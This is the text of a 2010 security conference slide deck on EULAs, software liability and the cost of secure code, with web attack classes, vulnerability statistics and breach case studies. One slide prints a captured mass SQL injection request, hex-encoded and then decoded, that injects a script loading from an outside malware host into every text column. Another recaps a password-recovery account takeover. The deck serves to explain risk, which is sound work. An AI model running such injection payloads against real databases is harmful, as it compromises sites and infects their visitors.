State of the EULA -- "Who pays for Secure Code?"

© 2010 WhiteHat, Inc.
Joshua Marpet
Security Solutions Specialist
5.1.2010
State of the EULA
Who pays for Secure Code?
Wednesday, May 12, 2010

© 2010 WhiteHat, Inc. | Page
Definitions
Secure Software -
• software that is written so as to preclude the possibility of
syntactical or technical attacks.
• software written using a secure framework
• software executed behind a Secure Framework appliance
EULA - End User License Agreement
• End User License Agreement - A software license agreement is
a contract between the "licensor" and purchaser of the right to
use software. The license may define ways under which the
copy can be used, in addition to the automatic rights of the
buyer including the first sale doctrine and 17 U.S.C. § 117
(freedom to use, archive, re-sale, and backup).
• Many form contracts are only contained in digital form, and only
presented to a user as a click-through where the user must
"accept". As the user may not see the agreement until after he
or she has already purchased the software, these documents
may be contracts of adhesion. These documents often call
themselves end-user license agreements (EULAs).
2
Reason

Because they can

To Hold Harmless

To circumvent copyright law

to extend copyright where it is prohibited

Anti-Terrorism Eula
3
You agree ... development,
design ... production of
missiles, or nuclear,
chemical or biological
weapons.
iTunes? Nukes? Srsly?

“Do not taunt happy fun ball”
Srsly??

SDLC
Software Development Life Cycle
7
Why do we need EULA’s? Because of the SDLC.

SDLC
7
Do you see
the word

SDLC
7
Do you see
the word
Security?

Implicit Security
8
How is this different from say, a car? Your car has the capability to do great damage to people or property. Where does the
liability lie if that damage occurs?

Driver

Licensing

Insurance

Laws

Police to ensure laws are followed

Road Engineering to make it harder to get in wrecks

Manufacturer

IF auto is found to be defective

LARGE liability

Firestone Tires

Toyota Gas Pedal/carpet/computer/whatever!

NHTSA crash ratings

huge insurance policies to offset

Software security is Explicit. It must be specified by the person or company commissioning the software.
Automobile Security is IMPLICIT - built into the automobile design process, mandated by various regulatory agencies, and
incentivized by insurance companies who DON't want to pay out on huge claims from owners and manufacturer's alike.

Explicit Results
Consumer-software they bought is not built implicitly secure.

keep track of security patches for the software I own

purchase 3rd party means to protect computer from:malicious internet based software.

Random Worms, Trojans, Viruses, etc.
Companies -if used in productions environments, they take on liability

Secure Code = ?
11
Why is Secure Code Explicit? Money. Developers receive no extra money to write secure code. As a matter of fact, they are
actually penalized. Development teams are on deadlines for functional code, not secure functional code. Taking the time to
write secure code will take away from the time needed to get the functionality, user interface (UI), documentation, etc, done.

Dev Team Ramifications
12
What would happen to individual developers, or small dev teams if security was IMPLICIT? The days of agile development, and
small teams coming up with widgets or "apps" would be over. The equivalent of malpractice insurance would simply be setting
the bar too high for individuals or small teams to get over, much as it is in the auto or plane industry today. (Mind you, I'm not
suggesting we should change the auto or plane industry, just making a comparison.)

Open Source?
13
What about open source software? If we keep the comparisons going, it would fit into much the same idea as "X" or
experimental planes are in, or hot rods, in the car industry. So long as it meets some reasonable definition of safety, you can
get insurance. That insurance will be with very much smaller claim limits, and it will cover a lot fewer categories of problems,
but if you choose to have that experimental plane or hot rod car, that's the explicit choice you make. If you choose to go with
open source software, you save on up front costs, but you have explicitly made a choice to have software without implicit
support.

Marketability
14
There's also the marketability of developer skills. As a developer, would you rather have Java, .NET, and C# on your resume, or
MyKonos, which although good, no one has heard of.

Secure Code = ?
Extra Testing!
15
So what would happen if we got rid of the EULA? If it was decreed that code HAS to be secure, out of the gate?
We would quickly have problems finding developers who know how to code securely. But that can be fixed via using secure
frameworks, secure code appliances, and/or a heck of a lot of developer education. Once that problem was solved, the cost of
software would rise dramatically. Testing would become an onerous burden on dev teams, as every revision of code would
require full rounds of QA, regression testing, unit testing, etc. This is besides the extra time (read money) it would take to write
the initial code as secure.

Secure Framework-MyKonos
16
Example of a secure framework, and a secure code appliance. (similar to a WAF, but not as widely known)

Top Ten Web Hacking Techniques (2009)
MUST be able to protect against
HOSTILE WEB PAGE
MUST be able to protect against
HOSTILE WEB USER
17

Website Classes of Attacks

Technical: Automation Can Identify
Command Execution
• Buffer Overflow
• Format String Attack
• LDAP Injection
• OS Commanding
• SQL Injection
• SSI Injection
• XPath Injection
Information Disclosure
• Directory Indexing
• Information Leakage
• Path Traversal
• Predictable Resource Location
Client-Side
• Content Spoofing
• Cross-site Scripting
• HTTP Response Splitting*

Technical: Automation Can Identify
Command Execution
• Buffer Overflow
• Format String Attack
• LDAP Injection
• OS Commanding
• SQL Injection
• SSI Injection
• XPath Injection
Information Disclosure
• Directory Indexing
• Information Leakage
• Path Traversal
• Predictable Resource Location
Client-Side
• Content Spoofing
• Cross-site Scripting
• HTTP Response Splitting*
Business Logic: Humans Required
Authentication
• Brute Force
• Insufficient Authentication
• Weak Password Recovery Validation
• CSRF*
Authorization
• Credential/Session Prediction
• Insufficient Authorization
• Insufficient Session Expiration
• Session Fixation
Logical Attacks
• Abuse of Functionality
• Denial of Service
• Insufficient Anti-automation
• Insufficient Process Validation

http://blogs.apache.org/infra/entry/apache_org_04_09_2010

Mass SQL Injection
22
• Generic SQL Injection populates databases with malicious
JavaScript IFRAMEs
•(Millions of websites sites infected - more every day)
• Visitors arrive and their browser auto-connects to a malware
server infecting their machine with trojans -- or the website is
damaged and can no longer conduct business.
• Botnets form then continue SQL injecting websites
• Infected sites risk becoming blacklisted on search engines
and Web filtering gateways causing loss of visitors
Random Opportunistic

"GET /?;DECLARE%20@S%20CHAR(4000);SET%20@S=cast
(0x4445434C415245204054207661726368617228323535292C404320766172636861
72283430303029204445434C415245205461626C655F437572736F7220435552534F5
220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D20737973
6F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D6
22E696420616E6420612E78747970653D27752720616E642028622E78747970653D39
39206F7220622E78747970653D3335206F7220622E78747970653D323331206F72206
22E78747970653D31363729204F50454E205461626C655F437572736F722046455443
48204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4
043205748494C4528404046455443485F5354415455533D302920424547494E206578
65632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B2
72B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F736
3726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520
272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F736
46F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C
212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736
F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F
72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));
EXEC(@S); HTTP/1.1" 200 6338 "-"
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.
1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script
src="http://www.example.com/csrss/w.js"></script><!--''')FETCH NEXT FROM
Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
Decoded...

http://www.wired.com/threatlevel/2009/08/tjx-hacker-charged-with-heartland/
http://government.zdnet.com/?p=5242
http://www.washingtonpost.com/wp-dyn/content/article/2009/08/17/AR2009081701915.html?hpid=sec-tech
Victims
TJ Maxx
Barnes & Noble
BJ’s Wholesale
Boston Market
DSW Shoe Warehouse
Forever 21
Office Max
Sports Authority
Heartland Payment Systems
Hannaford Brothers
7-Eleven
Dave and Busters
Techniques
SQL Injection
Sniffers
Wireless Security / War Driving
Shared Passwords
Malware
Anti-Forensics
Backdoors
Social Engineering
Hacker 1
Hacker 2
Albert "Segvec" Gonzalez
Fully Targeted

Twitter Hacker
25
http://www.techcrunch.com/2009/07/19/the-anatomy-of-the-twitter-attack/

Twitter Hacker
25
Hacker Croll initiates a password recovery for a Twitter
employee’s Gmail account. Reset email to secondary
account: ******@h******.com.

Twitter Hacker
25
account: ******@h******.com.
Guesses secondary Hotmail account, deactivated, but is able
to re-register the account. Resends the reset email and bingo.

Twitter Hacker
25
account: ******@h******.com.
Pilfers inbox for passwords to other Web services, sets the
Gmail password to the original so employee would not notice.

Twitter Hacker
25
account: ******@h******.com.
Owned!
Used the same password to compromise employee's email
on Google Apps, steal hundreds of internal documents, and
access Twitter's domains at GoDaddy. Sent to TechCrunch.

Twitter Hacker
25
account: ******@h******.com.
Owned!
Personal AT&T, MobileMe, Amazon, iTunes and other accounts
accessed using username/passwords and password recovery
systems.

Twitter Hacker
25
“I’m sorry” - Hacker Croll
account: ******@h******.com.
Owned!
Personal AT&T, MobileMe, Amazon, iTunes and other accounts
accessed using username/passwords and password recovery
systems.

Business Goals & Budget Justification
26
Risk Mitigation
"If we spend $X on Y, we’ll reduce risk of loss of $A by B%."
Due Diligence
"We must spend $X on Y because it’s an industry best-practice."
Incident Response
"We must spend $X on Y so that Z never happens again."
Regulatory Compliance
"We must spend $X on Y because <insert regulation> says so."
Competitive Advantage
"We must spend $X on Y to make the customer happy."

65%
47%
30%
18% 17% 14% 11% 11% 10% 9%
Cross-Site Scripting
Information Leakage
Content Spoofing
Insufficient Authorization
SQL Injection
Predictable Resource Location
Session Fixation
Cross-Site Request Forgery
Insufficient Authentication
HTTP Response Splitting
Percentage likelihood of a website having
a vulnerability by class
WhiteHat Security Top Ten

Time-to-Fix (Days)
28
58
85
71
72
38
79
104
56
125
80
Best-case scenario: Not all vulnerabilities have been fixed...
Cross-Site Scripting
Information Leakage
Content Spoofing
Insufficient Authorization
SQL Injection
Predictable Resource Location
Session Fixation
Cross-Site Request Forgery
Insufficient Authentication
HTTP Response Splitting

Resolution Rate - By Class
29
Class of Attack % resolved severity
Cross Site Scripting 20% urgent
Insufficient Authorization 19% urgent
SQL Injection 30% urgent
HTTP Response Splitting 75% urgent
Directory Traversal 53% urgent
Insufficient Authentication 38% critical
Cross-Site Scripting 39% critical
Abuse of Functionality 28% critical
Cross-Site Request Forgery 45% critical
Session Fixation 21% critical
Brute Force 11% high
Content Spoofing 25% high
HTTP Response Splitting 30% high
Information Leakage 29% high
Predictable Resource Location 26% high

http://securityblog.verizonbusiness.com/2009/04/15/2009-dbir/
How the breach was detected:
• 3rd party detection due to FRAUD (55%)
• 3rd party detection NOT due to fraud (15%)
• Employee Discovery (13%)
• Unusual System Performance (11%)

http://www.zdnet.com.au/mcafee-clients-do-you-have-the-guts-339302660.htm?omnRef=http%3A%2F
%2Fwww.zdnet.com.au%2Fmcafee-clients-do-you-have-the-guts-339302660.htm
So which would you rather have? Software with Implicit security, and the corresponding high bar to entry, with mal-dev
insurance policies and government agencies mandating security practices? Or software without implicit security, and the EULA of
the Damned?

References/Organizations
OWASP - Open Web Application Security Project
http://www.owasp.org
• Webgoat - VM’s with Vulns to hack
• Webscarab - Proxy to see how hackers work
• Multiple other projects!
• Join! It’s free!
WASC - Web Application Security Consortium
http://www.webappsec.org
• TC V2 - http://projects.webappsec.org/Threat-Classification
33

© 2010 WhiteHat, Inc.
Joshua Marpet
Security Solutions Specialist
Joshua.Marpet@whitehatsec.com
Jeremiah Grossman
Blog: http://jeremiahgrossman.blogspot.com/
WhiteHat Security
http://www.whitehatsec.com/
ThankYou!

State of the EULA -- "Who pays for Secure Code?"

Recommended

Recommended

More Related Content

More from Rochester Security Summit

More from Rochester Security Summit (11)

Recently uploaded

Recently uploaded (20)

State of the EULA -- "Who pays for Secure Code?"